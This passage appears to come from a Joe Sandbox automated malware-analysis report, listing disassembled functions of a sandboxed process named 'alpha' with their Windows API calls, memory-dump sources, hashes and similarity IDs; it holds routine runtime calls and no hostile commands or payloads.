                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00EF56A2
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F0122B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 22757656-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 56c649c7d6cca9af5f3dc6165c17c43f9cad38cdfbfc244690f45393ced628f6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bfcf010efd1dc2de75013106c7c7cfac305f04b7c6b55fe3bd5a3c2986b3d9ad
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56c649c7d6cca9af5f3dc6165c17c43f9cad38cdfbfc244690f45393ced628f6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E101DB72900118BFD7206BA89C4DB9E7BA8E745734F224315F631E31E0EBB04806A691
                                                                                                                                                                                                                                                                                                                                                      Function 00F024F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00F022F8), ref: 00F02514
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F0251B
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00F022F8), ref: 00F02539
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F02540
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 119f8e81305ea9d556337b5f6099c1d8a89f808aa6831d89574b3f3c3177b18b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2f9fc1e53c86964308720ea4a50cef45da413466a86a55aeec17f361591a7ba0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 119f8e81305ea9d556337b5f6099c1d8a89f808aa6831d89574b3f3c3177b18b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F06272610601AFD7249FA0ED89B65B7F8FF48322F10092DE141C6080D778E9A5DFB5
                                                                                                                                                                                                                                                                                                                                                      Function 00EE8B96 Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00EE885E), ref: 00EE8B9D
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EE885E), ref: 00EE8BA4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00EEA9C5), ref: 00EEA9D8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00EEA9F3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00EEA9FA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00EEAA09
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00EEAA12
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00EE885E), ref: 00EFB5B5
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EFB5BC
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3480822025-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: be8e52e13baa3631d9812f4e3b6e7eedc13e154756b2016a8c254983feb968e9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d49b436ec8394b7806132df0bfc7e8790d571b364c9c60b34950a9eb418da099
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be8e52e13baa3631d9812f4e3b6e7eedc13e154756b2016a8c254983feb968e9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FE0D83220972967D6303FF5BC0EB463A94DB44772F050011F384E91C0DF28C841DBA2
                                                                                                                                                                                                                                                                                                                                                      Function 00EF6860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF6F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00EF6F4F
                                                                                                                                                                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00EF6872
                                                                                                                                                                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00EF6888
                                                                                                                                                                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00EF6896
                                                                                                                                                                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 00EF68B7
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9833631226d999c78007f9596707307ff0bbe7a446f37a9f8049c8c767d145fc
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 24f4c242352098c842b32a65542cb51369969a295bb78b48a3aa870282e2e854
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9833631226d999c78007f9596707307ff0bbe7a446f37a9f8049c8c767d145fc
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF0AC7561870CCFD728AF30FD0A5283BA1B705325B105E5DE561E62F1DB7A9441EB12
                                                                                                                                                                                                                                                                                                                                                      Function 00F09F18 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F09F24
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00F0449C,?,?,00000001,?), ref: 00F09F2C
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F09F42
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00F0449C,?,?,00000001,?), ref: 00F09F4A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6525fe462df11b7a4ebb75ce3447467cd8849d48d6ab94b981e2087b459ea0aa
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7a05beb2da11be80191315090ad2a57f827f1035be4b988fe611c07ce617bf31
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6525fe462df11b7a4ebb75ce3447467cd8849d48d6ab94b981e2087b459ea0aa
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E04F71900209FFDB20DBB0EC0EF9A776CEB04325F100505F525D60E1EAB5DA01A621
                                                                                                                                                                                                                                                                                                                                                      Function 00EE8235 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE824E
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE8256
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE8264
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE826C
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 955de23448e96920a62b6d4f801500e64fa85f91325ad7a01a99345ebf21d086
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 340cd97fb71d6d8a1ca792095d5d3fcb39c70aa7298989ca15f536b19479b7dc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 955de23448e96920a62b6d4f801500e64fa85f91325ad7a01a99345ebf21d086
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E04CB154420CDFDB55DFA0FD5DA953B66FB08711B058409F205C61B1DBBA9411FF12
                                                                                                                                                                                                                                                                                                                                                      Function 00EE72C6 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00EE729C), ref: 00EE72CF
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EE72D6
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00EE72DF
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EE72E6
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1310c4a6087f494eb6dffc9a9cdca9d4ada0e14e8b84831bd70a83dbf965e306
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3b3043e0b17ee1b2142342a1be41fb27751fab062e446cffcb4420a8d47f4480
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1310c4a6087f494eb6dffc9a9cdca9d4ada0e14e8b84831bd70a83dbf965e306
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAD0C932405514ABD7703FE0BC0EF863E28EF49333F010401F205820608ABC4862AF62
                                                                                                                                                                                                                                                                                                                                                      Function 00EF1A47 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF1AE2
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT()",?,)",00000000,-00000105,?,00000000,00000000), ref: 00EF1BA4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: )"
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-1962620678
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 70b71a9192041d7958f6f9cc54eff9a836b8278789b6a79ea04e30bd3d355a85
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2c43b04ddd86db460b3c1b0ef4120bb3187689dfb61242e936daf9f19228d464
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70b71a9192041d7958f6f9cc54eff9a836b8278789b6a79ea04e30bd3d355a85
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D81C570A0021DCBDB28DF68EC956B9B7F4FB44308F1554A9EA45F7261EB349D81DB40
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA62F: wcschr.MSVCRT ref: 00EEA635
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEC570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00EEC5BD
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEC570: RtlFreeHeap.NTDLL ref: 00EEC5C4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEC570: _setjmp3.MSVCRT ref: 00EEC630
                                                                                                                                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 00EFC21F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1A47: memset.MSVCRT ref: 00EF1AE2
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1A47: ??_V@YAXPAX@Z.MSVCRT()",?,)",00000000,-00000105,?,00000000,00000000), ref: 00EF1BA4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3818062306-2924197646
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0bce5544a098b85daba870053cb3a2170209a4899832e8fdfaec096ba99eb454
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b723f47b05a294d7c027a95a7935f2547d62cba1378870568310a059340c21ab
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bce5544a098b85daba870053cb3a2170209a4899832e8fdfaec096ba99eb454
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A651692170065E46EB246B7ADC513B732E2EF90758B386429DA06FB2A2FB61DD42C340
                                                                                                                                                                                                                                                                                                                                                      Function 00F0BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0BF88
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00F09E02,00F0CD80,00000030,00F0448F,?,?,?,00000001), ref: 00F0C008
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocProcessmemcpywcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3241892172-381716982
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 343022eb745bab619cb8e5ece88a4a2e5ecc7926e5c456e784e3e9853d8973d6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 67a7e87b2f203f3d438d48d5f1e9d978113fc4b1cbab8034af757495c12b6dc4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 343022eb745bab619cb8e5ece88a4a2e5ecc7926e5c456e784e3e9853d8973d6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9614F71E04219CBCF14CFA8D8906ADB7F1EB48314B25812EE816E72D0DB759941FF94
                                                                                                                                                                                                                                                                                                                                                      Function 00EEABC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEABE3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EECF10: _setjmp3.MSVCRT ref: 00EECF28
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EECF10: iswspace.MSVCRT ref: 00EECF6B
